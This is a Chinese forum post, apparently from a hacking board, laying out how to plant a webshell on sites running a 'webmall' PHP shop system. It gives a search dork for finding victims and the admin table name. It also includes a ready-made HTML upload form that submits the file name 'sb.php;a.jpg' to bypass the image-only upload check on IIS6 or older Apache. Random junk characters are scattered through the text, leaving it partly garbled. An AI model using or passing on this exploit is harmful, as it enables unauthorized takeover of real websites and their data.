关键字:inurl:webmall/detail.php?id2 |8 d3 r2 T5 |; H2 w
% V+ H7 t8 y7 N- C0 g: W& T* o
数据表:pwn_base_admin
. i# m3 c; v3 f+ J W4 z5 L . s) e6 Q( V- g. P/ S6 G
关于拿shell5 y" D/ O# E$ s0 {" q9 Z$ ~- F
0 O# v0 f6 }6 c$ H6 o( Z- j首先登录后台admin.php
' |7 C, k' q. I$ B i
( i# y: @1 V' m2 @& `% s7 u$ M看了upload.php源码,分析了一个下午,然后大约是明白了虽然上传那里只允许上传gif,jpg,png,bmp四种文件,但是并没有对文件名做限制。 \+ ]6 k8 ~+ W8 Q: n( j2 J
换句话说,sb.php;a.jpg这样的文件也是允许的,只要服务器是IIS6就拿到webshel,低版本的apache可以试着重命名为sb.php.jpg8 C: b- m* z% [; t0 u4 y$ \8 \
然后搞完了才发现,这里的比我的更精简,我那个蛋疼,膜拜下三石,然后就借用了,我的开始和他的一样是采取全部源码的,然后发现了更精简的
; i/ y$ W$ O2 E/ f4 \9 I+ X* t<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://xxx.com/kedit/upload_cgi/upload.php">
0 I2 {9 M2 f5 L" r `% E3 a1 H<input type="text" name="fileName" value="sb.php;a.jpg" />
2 ]( m& T0 F- j) D<input type="hidden" name="attachPath" value="news/pics/" />
: }& [$ X+ ], m2 @+ _8 a<input type="file" name="fileData" size="14" /></td> " p9 m! E$ i1 Z/ D) G' g: {5 M
<input type="submit" name="button" value="确定" /> / @( M' ^/ Q c* u
</form>
/ `( h" k( N t: X# }( \ # x' s* I! V1 S/ o
首先登录后台,然后把上面的文件保存为xx.html,修改action,然后再上传,如果为iis6就在上传了查看源码就好了。
2 z* j# `, C( C( K# V, Z5 v
% |6 C( ^$ ^( i. g( @3 i8 ] |
发表于 2012-11-9 20:52:15
收藏
支持
反对